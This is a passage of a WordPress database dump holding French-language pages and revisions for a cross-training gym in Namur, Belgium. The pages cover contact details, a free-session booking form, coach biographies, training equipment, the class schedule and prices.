(264, 1, '2013-07-03 20:37:31', '2013-07-03 20:37:31', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\n0485 / 92 . 02 . 12\r\n\r\nLes prises de RDV pour les séances de Team Training, Duo Training, Personnal Trainer ou Coatching nutritionnel se font exclusivement par téléphone.\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:37:31', '2013-07-03 20:37:31', '', 9, 'http://www.crosstrainingcenter.be/?p=264', 0, 'revision', '', 0),
(265, 1, '2013-07-03 20:42:29', '2013-07-03 20:42:29', '<p>Votre nom (obligatoire)<br />\r\n    [text* your-name] <br>\r\nVotre prénom (obligatoire)<br />\r\n    [text* your-firstname] <br>\r\nVotre email (obligatoire)<br />\r\n    [email* your-email] <br>\r\nVotre n° de téléphone (obligatoire)<br />\r\n    [text* your-tel]<br>\r\n[captchac captcha-696]<br>\r\nVeuillez recopier les caractères ci-dessus<br />\r\n    [captchar captcha-696] </p>\r\n\r\n<p>[submit \"Contactez moi pour une séance gratuite\"]</p>\nDemande séance gratuite\n[your-name] <[your-email]>\nDe : [your-name] <[your-email]>\r\nSujet : Demande séance gratuite\r\n\r\nDemande de séance gratuite :\r\n[your-name]\r\n[your-firstname]\r\n[your-email]\r\n[your-tel]\r\n\r\n\r\n--\r\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\njuliepierrard@hotmail.com\n\n\n\n1\nDemande séance gratuite\n[your-name] <[your-email]>\nDe : [your-name] <[your-email]>\r\nSujet : Demande séance gratuite\r\n\r\nDemande de séance gratuite :\r\n[your-name]\r\n[your-firstname]\r\n[your-email]\r\n[your-tel]\r\n\r\n\r\n--\r\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\nstv@otvr.net\n\n\n\nVotre message a bien été envoyé. Merci.\nErreur lors de l\'envoi du message. Veuillez réessayer plus tard ou contacter l\'administrateur d\'une autre manière.\nErreur de validation. Veuillez vérifier les champs et soumettre à nouveau.\nErreur lors de l\'envoi du message. Veuillez réessayer plus tard ou contacter l\'administrateur d\'une autre manière.\nMerci de bien vouloir accepter les conditions pour continuer.\nVeuillez remplir le champ obligatoire.\nLe code entre est incorrect.\nLe format numérique semble invalide.\nCe nombre est trop petit.\nCe nombre est trop grand.\nL\'adresse email semble invalide.\nL\'URL semble invalide.\nLe numéro de téléphone semble invalide.\nImpossible de télécharger le fichier.\nCe type de fichier n\'est pas autorisé.\nCe fichier est trop volumineux.\nImpossible de télécharger le fichier. Une erreur est survenue.\nVotre réponse est incorrecte.\nLe format de date semble invalide.\nCette date est trop tôt.\nCette date est trop tard.', 'Seance_gratuite', '', 'publish', 'open', 'open', '', 'sans-titre', '', '', '2013-07-04 19:42:34', '2013-07-04 19:42:34', '', 0, 'http://www.crosstrainingcenter.be/?post_type=wpcf7_contact_form&#038;p=265', 0, 'wpcf7_contact_form', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(266, 1, '2013-07-03 20:43:41', '2013-07-03 20:43:41', '<blockquote>\r\n<h1>Envie de vous essayer au cross training?</h1>\r\n</blockquote>\r\nVenez nous rencontrer afin de découvrir le déroulement d\'une séance de cross training.\r\n\r\nLaissez-nous vos coordonnées et nous vous recontacterons afin de planifier avec vous votre première séance gratuite.\r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'publish', 'closed', 'open', '', '266-2', '', '', '2013-11-03 10:12:44', '2013-11-03 10:12:44', '', 0, 'http://www.crosstrainingcenter.be/?page_id=266', 0, 'page', '', 0),
(267, 1, '2013-07-03 20:43:41', '2013-07-03 20:43:41', 'Venez découvrir les bienfaits du cross training lors d\'une première séance gratuite.\r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', '', '', 'inherit', 'open', 'open', '', '266-revision', '', '', '2013-07-03 20:43:41', '2013-07-03 20:43:41', '', 266, 'http://www.crosstrainingcenter.be/?p=267', 0, 'revision', '', 0),
(268, 1, '2013-07-03 20:38:07', '2013-07-03 20:38:07', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de Team Training, Duo Training, Personnal Trainer ou Coatching nutritionnel se font exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:38:07', '2013-07-03 20:38:07', '', 9, 'http://www.crosstrainingcenter.be/?p=268', 0, 'revision', '', 0),
(269, 1, '2013-07-03 19:59:08', '2013-07-03 19:59:08', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoatch\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-34', '', '', '2013-07-03 19:59:08', '2013-07-03 19:59:08', '', 20, 'http://www.crosstrainingcenter.be/?p=269', 0, 'revision', '', 0),
(270, 1, '2013-07-03 19:06:30', '2013-07-03 19:06:30', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\"><img class=\"alignnone size-full wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-07-03 19:06:30', '2013-07-03 19:06:30', '', 22, 'http://www.crosstrainingcenter.be/?p=270', 0, 'revision', '', 0),
(271, 1, '2013-07-03 20:01:27', '2013-07-03 20:01:27', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 20:01:27', '2013-07-03 20:01:27', '', 11, 'http://www.crosstrainingcenter.be/?p=271', 0, 'revision', '', 0),
(272, 1, '2013-07-03 19:06:31', '2013-07-03 19:06:31', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-102 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-103 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-03 19:06:31', '2013-07-03 19:06:31', '', 5, 'http://www.crosstrainingcenter.be/?p=272', 0, 'revision', '', 0),
(273, 1, '2013-07-03 19:11:58', '2013-07-03 19:11:58', '<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training (réservation obligatoire)</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision-8', '', '', '2013-07-03 19:11:58', '2013-07-03 19:11:58', '', 214, 'http://www.crosstrainingcenter.be/?p=273', 0, 'revision', '', 0),
(274, 1, '2013-07-03 20:43:50', '2013-07-03 20:43:50', 'Venez découvrir les bienfaits du cross training lors d\'une première séance gratuite.\r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-revision-2', '', '', '2013-07-03 20:43:50', '2013-07-03 20:43:50', '', 266, 'http://www.crosstrainingcenter.be/?p=274', 0, 'revision', '', 0),
